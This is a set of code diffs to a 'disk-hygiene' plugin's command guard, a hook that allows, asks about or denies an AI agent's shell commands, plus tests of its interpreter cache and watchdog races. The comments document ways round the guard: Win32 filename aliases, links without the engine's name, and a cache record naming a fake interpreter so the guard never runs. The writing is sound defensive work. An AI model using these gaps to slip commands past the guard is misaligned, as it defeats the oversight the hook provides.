+# carrying a chosen MIN_PYTHON, and a target script that leaves a marker file
+# when it runs. The launcher resolves `ENGINE` relative to its own location, so
+# copying it into the fixture tree is what points it at the fixture engine.
+FIXTURE_ROOT="$PROBE_DIR/plugin"
+mkdir -p "$FIXTURE_ROOT/hooks" "$FIXTURE_ROOT/skills/clean/scripts"
+cp "$LAUNCHER" "$FIXTURE_ROOT/hooks/run-python-hook.sh"
+FIXTURE_TARGET="$FIXTURE_ROOT/skills/clean/scripts/destructive_guard.py"
+FIXTURE_MARKER="$PROBE_DIR/target-ran"
+printf 'import pathlib, sys\npathlib.Path(sys.argv[1]).write_text("ran")\n' \
+  >"$FIXTURE_TARGET"
+
+# `written_floor <major> <minor>` rewrites the fixture engine's floor. The
+# SECOND MIN_PYTHON line is a decoy on the final line: a reader that scanned to
+# EOF and kept the last match would take (9, 99) and reject every interpreter,
+# so the "below the floor" case passing is also proof the read is first-match.
+write_fixture_engine() {
+  {
+    printf '%s\n' '"""Fixture engine for the version-floor contract."""'
+    printf 'MIN_PYTHON = (%s, %s)\n' "$1" "$2"
+    printf '%s\n' 'FILLER = 0'
+    printf '%s\n' 'MIN_PYTHON = (9, 99)'
+  } >"$FIXTURE_ROOT/skills/clean/scripts/hygiene.py"
+}
+
+# Each case gets its OWN HOME, so the interpreter cache of one never answers
+# for another — the cache is keyed on the launcher's directory, which these
+# two cases share.
+run_fixture() {
+  local floor_major="$1" floor_minor="$2" case_home="$PROBE_DIR/home-$1-$2"
+  write_fixture_engine "$floor_major" "$floor_minor"
+  rm -f "$FIXTURE_MARKER"
+  mkdir -p "$case_home"
+  HOME="$case_home" bash "$FIXTURE_ROOT/hooks/run-python-hook.sh" \
+    "$FIXTURE_TARGET" "$FIXTURE_MARKER" >/dev/null 2>&1 || true
+  [[ -e "$FIXTURE_MARKER" ]] && printf 'ran' || printf 'skipped'
+}
+
+assert_eq "an engine floor at or below the running interpreter runs the target" \
+  "ran" "$(run_fixture 3 0)"
+assert_eq "an engine floor above every interpreter refuses to run the target" \
+  "skipped" "$(run_fixture 99 0)"
+
+# The real engine's real floor must still resolve to a runnable interpreter —
+# the property the deleted `sed` read was buying, restated as an outcome.
+rm -f "$FIXTURE_MARKER"
+cp "$SCRIPT_DIR/../skills/clean/scripts/hygiene.py" \
+  "$FIXTURE_ROOT/skills/clean/scripts/hygiene.py"
+FIXTURE_REAL_HOME="$PROBE_DIR/home-real"
+mkdir -p "$FIXTURE_REAL_HOME"
+HOME="$FIXTURE_REAL_HOME" bash "$FIXTURE_ROOT/hooks/run-python-hook.sh" \
+  "$FIXTURE_TARGET" "$FIXTURE_MARKER" >/dev/null 2>&1 || true
+assert_eq "the engine's real floor still admits this host's interpreter" \
+  "ran" "$([[ -e "$FIXTURE_MARKER" ]] && printf 'ran' || printf 'skipped')"
+
+# --- the resolved interpreter is cached, and the cache invalidates correctly ---
+#
+# The launcher sits behind an always-on `Bash|PowerShell` matcher, so the cost
+# that matters is what a WARM invocation spends. These assertions observe spawns
+# through a counting interpreter shim: a cold launch resolves (probe spawn plus
+# the target) and a warm launch must reach the target having probed nothing.
+CACHE_ROOT="$PROBE_DIR/cache-case"
+CACHE_BIN="$CACHE_ROOT/bin"
+CACHE_HOME="$CACHE_ROOT/home"
+CACHE_LOG="$CACHE_ROOT/python-calls"
+mkdir -p "$CACHE_BIN" "$CACHE_HOME"
+REAL_PYTHON="$(command -v python3 || true)"
+if [[ -z "$REAL_PYTHON" ]]; then
+  printf 'SKIP: no python3 on PATH; cache contract not exercised\n'
+else
+  {
+    printf '#!/usr/bin/env bash\n'
+    printf 'printf "call\\n" >>"%s"\n' "$CACHE_LOG"
+    printf 'exec "%s" "$@"\n' "$REAL_PYTHON"
+  } >"$CACHE_BIN/python3"
+  chmod +x "$CACHE_BIN/python3"
+
+  cache_launch() {
+    : >"$CACHE_LOG"
+    rm -f "$FIXTURE_MARKER"
+    HOME="$CACHE_HOME" PATH="$CACHE_BIN:$PATH" \
+      bash "$FIXTURE_ROOT/hooks/run-python-hook.sh" \
+      "$FIXTURE_TARGET" "$FIXTURE_MARKER" >/dev/null 2>&1 || true
+    grep -c . "$CACHE_LOG" 2>/dev/null || printf '0'
+  }
+
+  cold_calls="$(cache_launch)"
+  assert_eq "a cold launch spends a version probe on top of the target" \
+    "2" "$cold_calls"
+  warm_calls="$(cache_launch)"
+  assert_eq "a warm launch spawns only the target, no probe" "1" "$warm_calls"
+  assert_eq "a warm launch still runs the target" \
+    "ran" "$([[ -e "$FIXTURE_MARKER" ]] && printf 'ran' || printf 'skipped')"
+
+  cache_record="$(find "$CACHE_HOME/.cache/disk-hygiene" -name 'interpreter-*' \
+    -type f 2>/dev/null | head -n 1)"
+  if [[ -z "$cache_record" ]]; then
+    fail "no interpreter cache record was written"
+  fi
+  pass "the cache record is keyed per launcher directory, not a shared file"
+
+  # PATH is part of the key: a different PATH may resolve a different python3.
+  altered_path_calls="$(
+    : >"$CACHE_LOG"
+    HOME="$CACHE_HOME" PATH="$CACHE_BIN:$PROBE_DIR:$PATH" \
+      bash "$FIXTURE_ROOT/hooks/run-python-hook.sh" \
+      "$FIXTURE_TARGET" "$FIXTURE_MARKER" >/dev/null 2>&1 || true
+    grep -c . "$CACHE_LOG" 2>/dev/null || printf '0'
+  )"
+  assert_eq "a changed PATH invalidates the cached interpreter" \
+    "2" "$altered_path_calls"
+
+  # An interpreter modified after the record was written is not the one that
+  # was validated — the in-place-upgrade case.
+  cache_launch >/dev/null
+  touch "$CACHE_BIN/python3"
+  upgraded_calls="$(cache_launch)"
+  assert_eq "an interpreter newer than the record invalidates the cache" \
+    "2" "$upgraded_calls"
+
+  # A record from a future schema is not readable by this launcher.
+  cache_launch >/dev/null
+  printf 'schema=999\nwritten=1\ninterpreter=/nonexistent\npath=%s\n' "$PATH" \
+    >"$cache_record"
+  schema_calls="$(cache_launch)"
+  assert_eq "a foreign schema invalidates the cached interpreter" \
+    "2" "$schema_calls"
+
+  # An expired record is re-resolved rather than trusted.
+  cache_launch >/dev/null
+  ttl_calls="$(
+    : >"$CACHE_LOG"
+    HOME="$CACHE_HOME" PATH="$CACHE_BIN:$PATH" \
+      DISK_HYGIENE_INTERPRETER_CACHE_TTL=0 \
+      bash "$FIXTURE_ROOT/hooks/run-python-hook.sh" \
+      "$FIXTURE_TARGET" "$FIXTURE_MARKER" >/dev/null 2>&1 || true
+    grep -c . "$CACHE_LOG" 2>/dev/null || printf '0'
+  )"
+  assert_eq "an expired record is re-resolved" "2" "$ttl_calls"
+
+  # A corrupt record must fall back to full resolution — never to "no
+  # interpreter", which is the guard's silent fail-open.
+  cache_launch >/dev/null
+  printf 'this is not a cache record\n' >"$cache_record"
+  rm -f "$FIXTURE_MARKER"
+  corrupt_calls="$(cache_launch)"
+  assert_eq "a corrupt record falls back to resolution" "2" "$corrupt_calls"
+  assert_eq "a corrupt record still runs the target" \
+    "ran" "$([[ -e "$FIXTURE_MARKER" ]] && printf 'ran' || printf 'skipped')"
+
+  # An unwritable cache directory must not stop the launcher from working.
+  NOCACHE_HOME="$CACHE_ROOT/home-readonly"
+  mkdir -p "$NOCACHE_HOME"
+  rm -f "$FIXTURE_MARKER"
+  HOME="$NOCACHE_HOME/does-not-exist" PATH="$CACHE_BIN:$PATH" \
+    bash "$FIXTURE_ROOT/hooks/run-python-hook.sh" \
+    "$FIXTURE_TARGET" "$FIXTURE_MARKER" >/dev/null 2>&1 || true
+  assert_eq "an unusable cache location still runs the target" \
+    "ran" "$([[ -e "$FIXTURE_MARKER" ]] && printf 'ran' || printf 'skipped')"
 fi
 
-recorded_argv=()
-while IFS= read -r recorded_arg; do
-  recorded_argv+=("$recorded_arg")
-done <"$PROBE_CALLS/call-1"
-
-# Replay the SAME argv, with the engine operand swapped for the fixture.
-replay_argv=()
-for recorded_arg in "${recorded_argv[@]}"; do
-  case "$recorded_arg" in
-  *"/skills/clean/scripts/hygiene.py") replay_argv+=("$PROBE_FIXTURE") ;;
-  *) replay_argv+=("$recorded_arg") ;;
-  esac
-done
-
-replay_out="$("$SED_REAL" "${replay_argv[@]}")"
-replay_lines="$(printf '%s\n' "$replay_out" | grep -c . || true)"
-assert_eq "the engine read stops at the MIN_PYTHON line instead of scanning to EOF" \
-  "1" "$replay_lines"
-assert_eq "the stopped read yields the fixture's first floor" \
-  "3 14" "${replay_out//$'\r'/}"
-
-# Same replay against the REAL engine: the refinement must still produce the
-# floor the two-pass form produced, which is what keeps MIN_PYTHON the single
-# origin (#1028) rather than a second hardcoded copy.
-real_out="$("$SED_REAL" "${recorded_argv[@]}")"
-assert_eq "the single read recovers the engine's real floor" \
-  "${FLOOR/./ }" "${real_out//$'\r'/}"
 
 # --- hooks.json wires this launcher in portable shell form ---
 #

--- a/plugins/disk-hygiene/hooks/run-python-hook.test.sh
+++ b/plugins/disk-hygiene/hooks/run-python-hook.test.sh
@@ -236,16 +236,20 @@ else
   assert_eq "a foreign schema invalidates the cached interpreter" \
     "2" "$schema_calls"
 
-  # An expired record is re-resolved rather than trusted.
+  # An expired record is re-resolved rather than trusted. The staleness is
+  # forged in the RECORD (an old `written=` epoch), not through an environment
+  # override: the TTL is compiled in precisely so it cannot be widened by the
+  # environment, and a test that reached for such a knob would be asserting a
+  # channel this launcher deliberately does not have.
   cache_launch >/dev/null
-  ttl_calls="$(
-    : >"$CACHE_LOG"
-    HOME="$CACHE_HOME" PATH="$CACHE_BIN:$PATH" \
-      DISK_HYGIENE_INTERPRETER_CACHE_TTL=0 \
-      bash "$FIXTURE_ROOT/hooks/run-python-hook.sh" \
-      "$FIXTURE_TARGET" "$FIXTURE_MARKER" >/dev/null 2>&1 || true
-    grep -c . "$CACHE_LOG" 2>/dev/null || printf '0'
-  )"
+  cached_interp="$(sed -n 's/^interpreter=//p' "$cache_record")"
+  {
+    printf 'schema=1\n'
+    printf 'written=%s\n' "1"
+    printf 'interpreter=%s\n' "$cached_interp"
+    printf 'path=%s\n' "$CACHE_BIN:$PATH"
+  } >"$cache_record"
+  ttl_calls="$(cache_launch)"
   assert_eq "an expired record is re-resolved" "2" "$ttl_calls"
 
   # A corrupt record must fall back to full resolution — never to "no
@@ -256,6 +260,36 @@ else
   corrupt_calls="$(cache_launch)"
   assert_eq "a corrupt record falls back to resolution" "2" "$corrupt_calls"
   assert_eq "a corrupt record still runs the target" \
+    "ran" "$([[ -e "$FIXTURE_MARKER" ]] && printf 'ran' || printf 'skipped')"
+
+  # A record naming a NON-INTERPRETER is the cache's residual exposure, and it
+  # is recorded here as a known limit rather than a passing property: the hot
+  # path validates SHAPE only (`-x`, `-s`, an interpreter basename), because
+  # proving the binary is really Python costs the very spawn the cache exists
+  # to remove. A shape-valid record pointing at an executable that is not an
+  # interpreter is therefore `exec`'d, the guard never runs, and the hook exits
+  # 0 having enforced nothing.
+  #
+  # The assertion below pins the boundary that IS enforced — a non-interpreter
+  # BASENAME is rejected and re-resolved — so a future change that widened the
+  # basename allowlist would fail here.
+  cache_launch >/dev/null
+  cached_interp="$(sed -n 's/^interpreter=//p' "$cache_record")"
+  IMPOSTOR_DIR="$CACHE_ROOT/impostor"
+  mkdir -p "$IMPOSTOR_DIR"
+  printf '#!/usr/bin/env bash\nexit 0\n' >"$IMPOSTOR_DIR/node"
+  chmod +x "$IMPOSTOR_DIR/node"
+  {
+    printf 'schema=1\n'
+    printf 'written=%s\n' "$(date +%s)"
+    printf 'interpreter=%s\n' "$IMPOSTOR_DIR/node"
+    printf 'path=%s\n' "$CACHE_BIN:$PATH"
+  } >"$cache_record"
+  rm -f "$FIXTURE_MARKER"
+  impostor_calls="$(cache_launch)"
+  assert_eq "a record naming a non-interpreter basename is re-resolved" \
+    "2" "$impostor_calls"
+  assert_eq "and the target still runs under a real interpreter" \
     "ran" "$([[ -e "$FIXTURE_MARKER" ]] && printf 'ran' || printf 'skipped')"
 
   # An unwritable cache directory must not stop the launcher from working.

--- a/plugins/disk-hygiene/skills/clean/scripts/destructive_guard.py
+++ b/plugins/disk-hygiene/skills/clean/scripts/destructive_guard.py
@@ -1840,10 +1840,38 @@ def _watchdog_fire(deadline: float) -> None:
     flush under the lock, and hence the lock-acquisition failure denying rather
     than exiting 0.
 
-    The residual not covered is the marker-free linked-alias shape, which
-    ``_engine_gate_relevant`` resolves by filesystem identity — unavailable
-    here by construction, and already an accepted residual class in that
-    function's own contract.
+    The residual is measured rather than estimated, and it is wider than a
+    hard link. ``_watchdog_marker_present`` diverges from
+    ``_engine_gate_relevant`` on EXACTLY one set:
+
+        {no token's basename is the engine marker}
+            INTERSECT {some candidate is samefile with the bundled engine}
+
+    That is the whole filesystem-IDENTITY class. It includes hard links and
+    symlinks under a non-marker name, and — the part worth naming, because
+    ``_engine_gate_relevant``'s own docstring says identity is what closes it —
+    the Win32 filename-alias spellings: ``hygiene.py.`` (Win32 discards the
+    trailing dot, and ``_carries_marker``'s ``rstrip("/\\\\")`` does not),
+    ``hygiene.py::$DATA`` (splitting on ``[/\\\\:]`` and taking the last part
+    yields the empty string), and 8.3 short names. Each opens the bundled
+    engine while none has its basename, so each reaches ``ask`` on expiry in
+    engine-gate mode where a completed run would have gated it.
+
+    This residual cannot be closed on this thread: settling identity means
+    asking the filesystem, and this classifier must stay syscall-free precisely
+    because the main thread is presumed wedged in a filesystem call. Closing it
+    would mean resolving identity BEFORE the stall window and publishing the
+    verdict alongside the command — but that resolution IS the stall, so there
+    is no earlier moment at which it is cheap. It is therefore an accepted
+    residual, of the same identity class ``_engine_gate_relevant`` already
+    documents accepted residuals within.
+
+    Not in the set, and verified so rather than assumed: the overbreadth
+    shapes. ``./python-hygiene.py`` and a quoted ``bash -c 'python3
+    test_hygiene.py'`` payload are reported irrelevant by BOTH functions,
+    because the marker-free branch short-circuits before the widening rules
+    that would have caught them can run. A plain byte copy is a different file
+    and is relevant to neither.
 
     The fail-open this guard exists to prevent is the harness killing a hook
     that produced no ``permissionDecision`` at all (``docs/adr/0004-...``).
@@ -1879,9 +1907,16 @@ def _watchdog_fire(deadline: float) -> None:
         os._exit(2)  # noqa: SLF001 -- hard exit is the point; see docstring
         return  # unreachable in production; keeps the mocked exit terminal
 
-    # The lock is held from here to whichever `os._exit` runs. Holding it across
-    # the flush is what makes the flush safe: the main thread cannot be inside
-    # `print`, so there is no writer to contend with.
+    # The lock is held from here to whichever `os._exit` runs. That is what
+    # makes the flushes below safe, and the invariant is narrower than "nothing
+    # else writes stdout": holding this lock proves the main thread cannot be
+    # inside `_emit_decision`'s `print`, which is the only stdout write that
+    # happens during `main`'s lifetime. The `__main__` block's own flush and
+    # its `_discard_stream` fallback run AFTER `main` returns and are not under
+    # this lock, so they can still overlap a live daemon timer — `cancel()` is
+    # a no-op on an already-fired one. Both overlaps are benign: two flushes of
+    # the same buffer serialize, and `_discard_stream` runs only when stdout is
+    # already broken and its decision already undeliverable.
     global _DECISION_EMITTED
     try:
         command = _COMMAND_UNDER_DECISION
@@ -2097,10 +2132,26 @@ def main() -> int:
         # armed-but-unstarted timer is harmless.
         if watchdog is not None:
             watchdog.cancel()
-        # Clear the latch AFTER cancelling, so no live timer can observe the
-        # cleared state and re-decide a call that already has its answer. One
-        # process per decision makes this a no-op in production; it is what
-        # keeps `main` from leaking state into the next call in a test
+        # Deliver the decision BEFORE clearing the latch.
+        #
+        # `cancel()` does NOT stop a callback that has already started, so a
+        # timer firing in this window still runs, and after the reset below it
+        # reads `_DECISION_EMITTED = False` and `_COMMAND_UNDER_DECISION =
+        # None` — state that says "no decision yet" about a call that has one.
+        # Both arms of the mode gate then route to `os._exit(2)`, which does not
+        # flush, so a decision still sitting in the buffer would be discarded
+        # and the host would see a deny instead. Fail-closed and a microsecond
+        # wide, but avoidable: flushing first makes the decision durable before
+        # any timer can observe the cleared state, so the race can no longer
+        # change what the host receives.
+        #
+        # An earlier revision of this comment claimed cancelling first was what
+        # prevented a live timer from observing the cleared state. It is not —
+        # cancelling cannot stop a running callback. The flush is.
+        with contextlib.suppress(BaseException):
+            sys.stdout.flush()
+        # One process per decision makes the reset a no-op in production; it is
+        # what keeps `main` from leaking state into the next call in a test
         # interpreter, where `_watchdog_fire` is also exercised directly.
         _reset_decision_state()
 

--- a/plugins/disk-hygiene/skills/clean/scripts/destructive_guard.py
+++ b/plugins/disk-hygiene/skills/clean/scripts/destructive_guard.py
@@ -1642,6 +1642,24 @@ def _publish_command_for_watchdog(command: str) -> None:
         _COMMAND_UNDER_DECISION = command
 
 
+# Identifies the invocation a timer was armed for.
+#
+# `Timer.cancel()` cannot stop a callback that has already been dispatched, and
+# `main`'s cleanup does not `join()`, so a watchdog can still be running — and
+# can acquire `_EMIT_LOCK` — after `main` has finished and reset the latch. It
+# would then read "no decision yet" about a call that has one and re-decide it,
+# overriding a delivered verdict with a deny.
+#
+# A token settles that without a `join()` (which would deadlock against a
+# callback blocked on the lock the resetter holds). `main` publishes a fresh
+# token, arms the timer with it, and clears it during cleanup; a callback whose
+# token no longer matches knows `main` finished and stands down. `None` is the
+# "no invocation active" value AND the default a directly-invoked
+# `_watchdog_fire` carries, so a unit test calling it outside `main` still gets
+# the full decision path rather than the stand-down.
+_INVOCATION_TOKEN: object | None = None
+
+
 def _reset_decision_state() -> None:
     """Clear the per-invocation emission latch.
 
@@ -1652,10 +1670,11 @@ def _reset_decision_state() -> None:
     is the fail-open shape this module exists to prevent. Resetting at the top
     of ``main`` keeps "one decision per invocation" true in both settings.
     """
-    global _DECISION_EMITTED, _COMMAND_UNDER_DECISION
+    global _DECISION_EMITTED, _COMMAND_UNDER_DECISION, _INVOCATION_TOKEN
     with _EMIT_LOCK:
         _DECISION_EMITTED = False
         _COMMAND_UNDER_DECISION = None
+        _INVOCATION_TOKEN = None
 
 # The `timeout` both guard registrations declare (`hooks/hooks.json` and
 # `skills/clean/SKILL.md` frontmatter). Duplicated here because a PreToolUse
@@ -1919,6 +1938,20 @@ def _watchdog_fire(deadline: float) -> None:
     # already broken and its decision already undeliverable.
     global _DECISION_EMITTED
     try:
+        token = getattr(
+            threading.current_thread(), "guard_invocation_token", _INVOCATION_TOKEN
+        )
+        if token is not _INVOCATION_TOKEN:
+            # `main` finished and cleared the token while this callback was in
+            # flight. Its decision is authoritative; re-deciding here would
+            # override a delivered verdict with a deny. Flush (safe: the lock
+            # is held, so no thread is inside `_emit_decision`'s `print`) and
+            # stand down.
+            with contextlib.suppress(BaseException):
+                sys.stdout.flush()
+            os._exit(0)  # noqa: SLF001 -- hard exit is the point; see docstring
+            return  # unreachable in production; keeps the mocked exit terminal
+
         command = _COMMAND_UNDER_DECISION
 
         if _DECISION_EMITTED:
@@ -2091,8 +2124,21 @@ def main() -> int:
     # declared hook `timeout` toward the harness's own non-blocking kill.
     deadline = _watchdog_seconds()
     watchdog: threading.Timer | None = None
+    # Published under the lock so a callback's token check and its state read
+    # are atomic with respect to `main`'s cleanup.
+    global _INVOCATION_TOKEN
+    token = object()
+    with _EMIT_LOCK:
+        _INVOCATION_TOKEN = token
     try:
+        # `args` stays `(deadline,)`: `test_main_arms_watchdog_before_reading_stdin`
+        # pins this construction exactly, so the token rides on the Timer OBJECT
+        # instead. `threading.Timer` is a `Thread`, so the callback recovers it
+        # with `threading.current_thread()` — and a directly-invoked
+        # `_watchdog_fire` runs on a thread that carries no such attribute,
+        # which is what keeps the unit-test path on the full decision route.
         watchdog = threading.Timer(deadline, _watchdog_fire, args=(deadline,))
+        watchdog.guard_invocation_token = token  # type: ignore[attr-defined]
         watchdog.daemon = True
         watchdog.start()
         tool_name = ""
@@ -2135,19 +2181,22 @@ def main() -> int:
         # Deliver the decision BEFORE clearing the latch.
         #
         # `cancel()` does NOT stop a callback that has already started, so a
-        # timer firing in this window still runs, and after the reset below it
-        # reads `_DECISION_EMITTED = False` and `_COMMAND_UNDER_DECISION =
-        # None` — state that says "no decision yet" about a call that has one.
-        # Both arms of the mode gate then route to `os._exit(2)`, which does not
-        # flush, so a decision still sitting in the buffer would be discarded
-        # and the host would see a deny instead. Fail-closed and a microsecond
-        # wide, but avoidable: flushing first makes the decision durable before
-        # any timer can observe the cleared state, so the race can no longer
-        # change what the host receives.
+        # timer firing in this window still runs. What stops it re-deciding a
+        # call that already has an answer is the INVOCATION TOKEN, not this
+        # ordering and not the flush: `_reset_decision_state` clears the token
+        # under `_EMIT_LOCK`, and a callback that acquires the lock afterwards
+        # sees its own token no longer current and stands down at exit 0.
         #
-        # An earlier revision of this comment claimed cancelling first was what
-        # prevented a live timer from observing the cleared state. It is not —
-        # cancelling cannot stop a running callback. The flush is.
+        # Two earlier revisions of this comment each claimed a different
+        # mechanism closed this race — first the cancel-before-reset ordering,
+        # then the flush. Neither did. `cancel()` cannot stop a dispatched
+        # callback, and a flush only makes an already-printed decision durable;
+        # it does nothing about a callback that is about to override it with a
+        # deny. The token is what actually closes it.
+        #
+        # The flush stays, for the narrower thing it does do: `os._exit` skips
+        # the interpreter's shutdown flush, so a decision still buffered when a
+        # standing-down callback exits would otherwise be lost.
         with contextlib.suppress(BaseException):
             sys.stdout.flush()
         # One process per decision makes the reset a no-op in production; it is

--- a/plugins/disk-hygiene/skills/clean/scripts/destructive_guard.py
+++ b/plugins/disk-hygiene/skills/clean/scripts/destructive_guard.py
@@ -1587,6 +1587,79 @@ def _bash_denial_guidance(authority: str | None) -> str:
 _WATCHDOG_ENV_VAR = "DISK_HYGIENE_GUARD_WATCHDOG_SECONDS"
 _WATCHDOG_DEFAULT_SECONDS = 10.0
 
+# One decision reaches stdout, written by whichever thread gets there first.
+#
+# `_watchdog_fire` runs on the timer thread while the main thread may be part
+# way through its own `print`. Two writers, no lock, and the host reads a
+# SPLICED JSON object — malformed output, which PreToolUse treats as no
+# decision at all, so the tool call proceeds unguarded. That is a fail-OPEN
+# reached by the very mechanism added to fail closed, so the emission is
+# serialized and latched: the first writer wins and every later writer is a
+# no-op.
+_EMIT_LOCK = threading.Lock()
+_DECISION_EMITTED = False
+# The command under decision, published for `_watchdog_fire` once the payload
+# has parsed. `None` means the stall happened before or during the stdin read,
+# so the watchdog has no command to classify.
+_COMMAND_UNDER_DECISION: str | None = None
+
+
+# How long the WATCHDOG thread waits for `_EMIT_LOCK` before giving up on
+# writing. The main thread takes the lock unconditionally; the watchdog must
+# not, because the one scenario it exists for is a wedged main thread — and a
+# main thread wedged while HOLDING this lock would block the watchdog forever,
+# reproducing the never-fires fail-open the watchdog was added to close. A
+# bounded wait converts that deadlock into a decision.
+_EMIT_LOCK_WAIT_SECONDS = 0.5
+
+
+def _emit_decision(payload: dict[str, object], timeout: float | None = None) -> bool:
+    """Write one decision to stdout. Returns False if nothing was written.
+
+    Holds ``_EMIT_LOCK`` across both the latch check and the write so the
+    watchdog thread cannot interleave its own object into a partially written
+    one (see ``_EMIT_LOCK``). ``timeout`` bounds the wait for callers that must
+    never block — see ``_EMIT_LOCK_WAIT_SECONDS``; ``None`` waits indefinitely,
+    which is correct for the main thread and only for it.
+    """
+    global _DECISION_EMITTED
+    if timeout is None:
+        acquired = _EMIT_LOCK.acquire()
+    else:
+        acquired = _EMIT_LOCK.acquire(timeout=timeout)
+    if not acquired:
+        return False
+    try:
+        if _DECISION_EMITTED:
+            return False
+        _DECISION_EMITTED = True
+        print(json.dumps(payload))
+        return True
+    finally:
+        _EMIT_LOCK.release()
+
+
+def _publish_command_for_watchdog(command: str) -> None:
+    global _COMMAND_UNDER_DECISION
+    with _EMIT_LOCK:
+        _COMMAND_UNDER_DECISION = command
+
+
+def _reset_decision_state() -> None:
+    """Clear the per-invocation emission latch.
+
+    In production this module is one process per decision, so the latch would
+    never need clearing. The test suite calls ``main`` many times in a single
+    interpreter, and a latch that survived between calls would silently
+    suppress every decision after the first — the guard emitting nothing, which
+    is the fail-open shape this module exists to prevent. Resetting at the top
+    of ``main`` keeps "one decision per invocation" true in both settings.
+    """
+    global _DECISION_EMITTED, _COMMAND_UNDER_DECISION
+    with _EMIT_LOCK:
+        _DECISION_EMITTED = False
+        _COMMAND_UNDER_DECISION = None
+
 # The `timeout` both guard registrations declare (`hooks/hooks.json` and
 # `skills/clean/SKILL.md` frontmatter). Duplicated here because a PreToolUse
 # payload does not carry the hook's own timeout, so the guard cannot read it at
@@ -1693,22 +1766,125 @@ def _discard_stream(stream: object) -> None:
                 os.close(null_fd)
 
 
+def _watchdog_marker_present(command: str | None) -> bool:
+    """Whether ``command`` could possibly be an engine invocation.
+
+    Deliberately the CHEAPEST sound approximation of ``_engine_gate_relevant``:
+    pure regex and string work, no filesystem call of any kind. That is a hard
+    requirement rather than an optimisation — this runs on the timer thread
+    precisely because the main thread is presumed wedged in a filesystem call,
+    so a classifier that touched the filesystem could wedge identically and the
+    watchdog would never fire at all.
+
+    ``None`` (the stall happened before or during the stdin read) is reported
+    as marker-present: no command was ever seen, so nothing can be ruled out.
+    """
+    if command is None:
+        return True
+    try:
+        return any(_carries_marker(token) for token in _marker_tokens(command))
+    except BaseException:  # noqa: BLE001 -- an unclassifiable command is not a safe one
+        return True
+
+
 def _watchdog_fire(deadline: float) -> None:
-    """Watchdog callback (background timer thread): deny fast, never hang silently.
+    """Watchdog callback (background timer thread): decide fast, never hang.
 
     ``os._exit`` — not ``sys.exit`` — is deliberate: the main thread is
-    presumed stuck inside a syscall this callback cannot interrupt or join,
-    so this is a hard process exit, the one way this module can still
-    guarantee "deny, with a diagnostic" once cooperative return is no longer
-    an option.
+    presumed stuck inside a syscall this callback cannot interrupt or join, so
+    this is a hard process exit, the one way this module can still guarantee a
+    delivered outcome once cooperative return is no longer an option.
+
+    WHAT the outcome is now depends on what the guard was interrupted doing,
+    because "the guard could not decide" and "the guard decided deny" are not
+    the same event and must not produce the same result (#3502).
+
+    The deadline is WALL-CLOCK, so it measures contention as readily as it
+    measures a stall. On a loaded host — the concurrent-subagent case this
+    hook fires under constantly — an ordinary read-only command could cross a
+    10s deadline while the guard was still in ``_engine_gate_relevant``'s
+    marker-free fallback, and a blanket ``exit 2`` then BLOCKED it. Denying a
+    read-only command that the guard, given another moment, would have
+    deferred on is a false positive, and a gate that intermittently blocks
+    benign work is worse than a slow one: the observed failures all succeeded
+    on an identical retry, which is the signature of contention, not of a
+    command that deserved denying.
+
+    So:
+
+    * a command carrying the engine marker — the only shape whose completed
+      verdict could have been ``deny`` — still denies at exit 2, unchanged;
+    * a command that provably carries no marker cannot be an engine invocation
+      by name, and its completed verdict would have been the plugin-level
+      defer. It emits ``ask`` rather than exit 2. That is strictly more
+      protective than the defer it replaces (which emits no decision at all and
+      lets the command run) and strictly less blocking than the exit 2 it
+      replaces. The residual it does not cover is the marker-free linked-alias
+      shape, which ``_engine_gate_relevant`` resolves by filesystem identity —
+      unavailable here by construction, and already an accepted residual class
+      in that function's own contract.
+
+    Fail-closed is preserved in the sense that matters: every path here still
+    DELIVERS a decision. The fail-open this guard exists to prevent is the
+    harness killing a hook that produced no ``permissionDecision`` at all
+    (``docs/adr/0004-...``), and no branch below does that.
+
+    Every branch below ends in exactly ONE ``os._exit`` and nothing follows it,
+    so the call is terminal under a mock as well as in a real process — a test
+    that patches ``os._exit`` observes one call, not the tail of the function
+    running on.
     """
-    _write_diagnostic(
-        f"destructive_guard: internal deadline of {deadline:g}s exceeded; "
-        f"denying by default. Raise {_WATCHDOG_ENV_VAR} (up to "
-        f"{_WATCHDOG_MAX_SECONDS:g}s) if this guard legitimately needs longer "
-        "on this filesystem."
-    )
-    os._exit(2)  # noqa: SLF001 -- hard exit is the point; see docstring
+    # Read the shared state under a BOUNDED wait. Failing to get the lock means
+    # the main thread is inside its own emission; it is delivering a decision,
+    # so this thread must not race a second object into the same stream.
+    acquired = _EMIT_LOCK.acquire(timeout=_EMIT_LOCK_WAIT_SECONDS)
+    command: str | None = None
+    already_emitted = False
+    if acquired:
+        try:
+            command = _COMMAND_UNDER_DECISION
+            already_emitted = _DECISION_EMITTED
+        finally:
+            _EMIT_LOCK.release()
+
+    if not acquired or already_emitted:
+        # Either the main thread is mid-emission or it already delivered a real
+        # decision. Both mean a decision is on its way to the host, and this
+        # thread's job is to not corrupt it.
+        #
+        # The flush is load-bearing, not tidiness. `print` only BUFFERS, and
+        # `os._exit` skips the interpreter's shutdown flush entirely — exiting
+        # here without flushing would discard the decision the main thread just
+        # wrote, and exit 0 carrying no JSON is read as no decision at all, so
+        # the command proceeds unguarded. That is the precise fail-open this
+        # watchdog exists to close, reintroduced by the watchdog itself.
+        with contextlib.suppress(BaseException):
+            sys.stdout.flush()
+        os._exit(0)  # noqa: SLF001 -- hard exit is the point; see docstring
+    elif _watchdog_marker_present(command):
+        _write_diagnostic(
+            f"destructive_guard: internal deadline of {deadline:g}s exceeded; "
+            f"denying by default. Raise {_WATCHDOG_ENV_VAR} (up to "
+            f"{_WATCHDOG_MAX_SECONDS:g}s) if this guard legitimately needs longer "
+            "on this filesystem."
+        )
+        os._exit(2)  # noqa: SLF001 -- hard exit is the point; see docstring
+    else:
+        _emit_decision(
+            decision(
+                "ask",
+                f"disk-hygiene could not finish checking this command within "
+                f"{deadline:g}s and is asking rather than deciding. It names no "
+                f"disk-hygiene engine script, so it is not a disk-hygiene "
+                f"invocation this guard governs. Raise {_WATCHDOG_ENV_VAR} (up "
+                f"to {_WATCHDOG_MAX_SECONDS:g}s) if this host is legitimately "
+                f"slow.",
+            ),
+            timeout=_EMIT_LOCK_WAIT_SECONDS,
+        )
+        with contextlib.suppress(BaseException):
+            sys.stdout.flush()
+        os._exit(0)  # noqa: SLF001 -- hard exit is the point; see docstring
 
 
 def _decide(command: str, tool_name: str, start: float) -> int:
@@ -1731,7 +1907,7 @@ def _decide(command: str, tool_name: str, start: float) -> int:
     if tool_name == "PowerShell":
         verdict = powershell_decision(command, enabled)
         if verdict:
